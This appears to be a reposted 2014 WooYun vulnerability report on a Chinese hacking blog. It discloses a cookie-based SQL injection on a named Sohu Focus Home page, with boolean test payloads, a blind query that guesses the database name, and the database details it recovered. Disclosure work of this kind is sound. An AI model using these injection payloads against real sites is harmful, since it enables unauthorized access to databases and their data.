记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

搜狐焦点家居某处SQL注入(Cookie注入)

2014-08-21 16:55

漏洞url:http://home.focus.cn/elite/newscenter.php?class_id=22

存在cookie注入的变量:class_id=22

测试payload(放到Cookie中)

1. class_id=22' anD 1=1 anD '1'='1 正常页面

QQ20140707-2@2x.png



2.class_id=22' anD 1=11 anD '1'='1 返回不一样

QQ20140707-1@2x.png



猜解数据库名语句:22' anD (select ascii(substr(database(),1,1)))>100 anD '1'='1

猜解过程省略,结果如下

漏洞证明:

注入信息如下:

注入类型: 字符型

数据库类型: MySQL

数据库名: home

用户名: readonly@10.xx.xx.x

修复方案:

请检查并修复

知识来源: www.wooyun.org/bugs/wooyun-2014-067707

阅读:64413 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“搜狐焦点家居某处SQL注入(Cookie注入)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云